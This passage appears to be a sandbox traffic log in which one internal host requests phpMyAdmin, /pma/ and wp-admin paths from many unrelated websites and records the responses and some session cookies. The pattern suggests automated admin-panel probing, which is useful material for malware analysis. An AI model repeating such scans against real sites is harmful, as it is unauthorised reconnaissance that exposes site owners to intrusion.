Connection: close
2024-02-05 11:16:10 UTC    1252    IN    Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xwH92yQyNSJfRxvbveXXzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:10 UTC    397    IN    Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:10 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
173           192.168.2.6    63157          44.199.96.179     443

Timestamp    Bytes transferred    Direction    Data
2024-02-05 11:16:10 UTC    182    OUT    GET /phpMyAdmin/ HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC    197    IN    HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Content-Length: 7358
Connection: close
Server: nginx/1.12.2
Vary: Accept-Encoding
ETag: "5df8f9a3-1cbe"
2024-02-05 11:16:10 UTC    7358    IN    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID    Source IP      Source Port    Destination IP    Destination Port
174           192.168.2.6    63890          185.78.166.130    443

Timestamp    Bytes transferred    Direction    Data
2024-02-05 11:16:10 UTC    207    OUT    GET /phpmyadmin/ HTTP/1.1
Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC    398    IN    HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=1cu8t1tn9j3ptjlvcbsiprrgvu; path=/
X-Cache-Status: MISS
X-Powered-By: PleskLin
2024-02-05 11:16:11 UTC    15986    IN    Data Ascii: 1d22<!DOCTYPE html><html lang="th"><head> ... Start Meta --> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="ahrefs-site-verification" content="3fbfe1a999442d746bef0aab7d579a75f597436b7fbba7bc96
2024-02-05 11:16:11 UTC    11874    IN    Data Ascii: <span style="font-size: 22px; color: green; font-style: italic"> 30 </span> - 31 2563 </p> -->


Session ID    Source IP      Source Port    Destination IP    Destination Port
175           192.168.2.6    63138          104.18.32.109     443

Timestamp    Bytes transferred    Direction    Data
2024-02-05 11:16:10 UTC    337    OUT    GET /pma/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC    1181    IN    HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12941
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e6b99b12d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
176 | 192.168.2.6 | 64053 | 164.100.213.210 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 171 | OUT | GET /phpmyadmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 932 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server:
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 05 Feb 2024 11:16:10 GMT
Connection: close
Content-Length: 176
2024-02-05 11:16:10 UTC | 176 | IN | Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/">here</a>.</h2></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
177 | 192.168.2.6 | 63997 | 36.255.71.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 325 | IN | HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Mon, 05 Feb 2024 11:16:11 GMT
content-type: text/html; charset=utf-8
content-length: 66424
vary: Accept-Encoding
x-powered-by: Express
etag: W/"10378-WueGOxVCt7BIL9I4WlUOvR0gh88"
access-control-allow-origin: *
cache-control: max-age=31536000
connection: close
2024-02-05 11:16:11 UTC | 12175 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <base href="/"> <title>Instructory</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="keywords" content="Teaching, Instruction, E-Learni
2024-02-05 11:16:11 UTC | 1398 | IN | Data Ascii: [_ngcontent-sc231]{position:relative;font-size:19px;color:#fff;padding:0 10px;display:inline-block;margin-top:3px}.header-main-section[_ngcontent-sc231] .header-menu-links[_ngcontent-sc231] .main-menu-link[_ngcontent-sc231] li[_ngcontent-sc231] a.
2024-02-05 11:16:11 UTC | 16320 | IN | Data Ascii: nt-sc231]{color:#fff}.header-main-section[_ngcontent-sc231] .header-menu-links[_ngcontent-sc231] .main-menu-link[_ngcontent-sc231] .profile-avatar[_ngcontent-sc231]{padding-left:25px;padding-right:0;border-radius:50px}.header-main-section[_ngcontent
2024-02-05 11:16:11 UTC | 10242 | IN | Data Ascii: ] .course-category-menu[_ngcontent-sc231] .course-category-menu-list[_ngcontent-sc231]{height:200px;margin-top:3px}.header-wrapper[_ngcontent-sc231] .header-main-section[_ngcontent-sc231] .header-menu[_ngcontent-sc231] .course-category-wrapper[_
2024-02-05 11:16:11 UTC | 1398 | IN | Data Ascii: ign:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .main-row[_ngcontent-sc91] .contact-us[_ngcontent-sc91]{text-align:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .footer-links-section[_ngcontent-sc91]{max-wid
2024-02-05 11:16:11 UTC | 4194 | IN | Data Ascii: nt-sc91] .main-row[_ngcontent-sc91] .contact-us[_ngcontent-sc91]{text-align:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .footer-links-section[_ngcontent-sc91]{max-width:95%;margin:auto}footer[_ngcontent-sc91] .subscribe[_ngco
2024-02-05 11:16:11 UTC | 12142 | IN | Data Ascii: ngcontent-sc19]{animation-delay:-1.1s}.sk-wave[_ngcontent-sc19] .sk-rect3[_ngcontent-sc19]{animation-delay:-1s}.sk-wave[_ngcontent-sc19] .sk-rect4[_ngcontent-sc19]{animation-delay:-.9s}.sk-wave[_ngcontent-sc19] .sk-rect5[_ngcontent-sc19]{animation-d
2024-02-05 11:16:11 UTC | 48 | IN | Data Ascii: c91="" routerlink="#" href="/%23"> Course Catego
2024-02-05 11:16:11 UTC | 8507 | IN | Data Ascii: ries </a></li><li _ngcontent-sc91=""><a _ngcontent-sc91="" routerlink="#" href="/%23"> Create an Account </a></li></ul></div><div _ngcontent-sc91=""><div _ngcontent-sc91="" class="support"><div _ngcontent-sc91="" class="title">Need Support</div><ul _ngcon


Session ID | Source IP | Source Port | Destination IP | Destination Port
178 | 192.168.2.6 | 63133 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:10 UTC  1252  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m6hq6Le_E0kk1NolmmUTAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:10 UTC  397  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:10 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
179         192.168.2.6  63171        138.66.39.205   443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  184  OUT  GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC  249  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1446536446601918,0:1)
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:10 UTC  194  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found.</p></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
180         192.168.2.6  65169        44.195.133.145  443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  655  OUT  GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://ucv.blackboard.com/wp-login.php
2024-02-05 11:16:11 UTC  1092  IN  HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707133570,id:AA5B0F56EE09038D64C6A202F41CF905,signature:e16c598909ce53479710348186cc41d89e4f8b844724c259eecf61bcf62fa508,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-220-254.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
2024-02-05 11:16:11 UTC  15292  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ba9... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
2024-02-05 11:16:11 UTC  16373  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: zedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}function l(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,error
2024-02-05 11:16:11 UTC  16384  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6111 rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_factor_authentication.css?v=3900.84.0-rel.31+aedff82_authLogin" id="css_1">
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 4d 4f 4e 54 48 5f 53 48 4f 52 54 2e 30 30 35 32 30 27 5d 20 3d 20 27 65 6e 65 20 66 65 62 20 6d 61 72 20 61 62 72 20 6d 61 79 20 6a 75 6e 20 6a 75 6c 20 61 67 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTINGS['LOCALE_SETTINGS.MONTH_SHORT.00520'] = 'ene feb mar abr may jun jul ago
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 75 62 6c 69 63 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); deleteCookie("JSESSIONID", "/public", null, true); d
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC12497INData Raw: 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 69 6e 70 75 74 22 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 2d 6c 61 62 65 6c 22 3e 45 73 63 72 69 62 61 20 65 6c 20 63 c3 b3 64 69 67 6f 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: le" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verification-input" class="custom-label">Escriba el cdigo</label>


Session ID | Source IP | Source Port | Destination IP | Destination Port
181 | 192.168.2.6 | 65189 | 23.4.32.216 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 168 | OUT | GET / HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 1901 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060 https://steamvideo-a.akamaihd.net/; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host ;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Length: 44536
Connection: close
Set-Cookie: sessionid=e6ee45b1863c6c9478af21a3; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C30188d811e243eaaab468117a5a3e458; Path=/; Secure; HttpOnly; SameSite=None
2024-02-05 11:16:11 UTC | 14483 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-02-05 11:16:11 UTC | 10093 | IN | Data Ascii: ntent"><div class="logo"><span id="logo_holder"><a href="https://store.steampowered.com/" aria-label="Link to the Steam Homepage"><img src="https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg
2024-02-05 11:16:11 UTC | 16384 | IN | Data Ascii: s:\/\/checkout.steampowered.com\/&quot;,&quot;IMG_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/images\/&quot;,&quot;STEAMTV_BASE_URL&quot;:&quot;https:\/\/steam.tv\/&quot;,&quot;HELP_BASE_URL&quot;:&quot;https:\/\/help.steampowe
2024-02-05 11:16:11 UTC | 3576 | IN | Data Ascii: ressBarContainer" class="apphub_ProgressBarBG"><div id="LoadingProgressBar" class="apphub_ProgressBar"></div></div></div><div class="apphub_NoMoreContent" id="NoMoreContent" style="display: none"><div class="apphub_NoMoreContentTex


Session ID | Source IP | Source Port | Destination IP | Destination Port
182 | 192.168.2.6 | 65256 | 195.85.23.95 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:11 UTC | 457 | OUT | GET /phpmyadmin HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; ts_type2=1; __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; fv=ZQp3ZGZkAmN3ZD==
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 758 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
referrer-policy: origin-when-cross-origin
x-ua-compatible: IE=edge,chrome=1
set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:11 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:16:11 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
cache-control: no-cache, no-store, must-revalidate
x-zone: 3-ded1806-web12
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abd61af56b0e8-ATL
alt-svc: h3=":443"; ma=86400
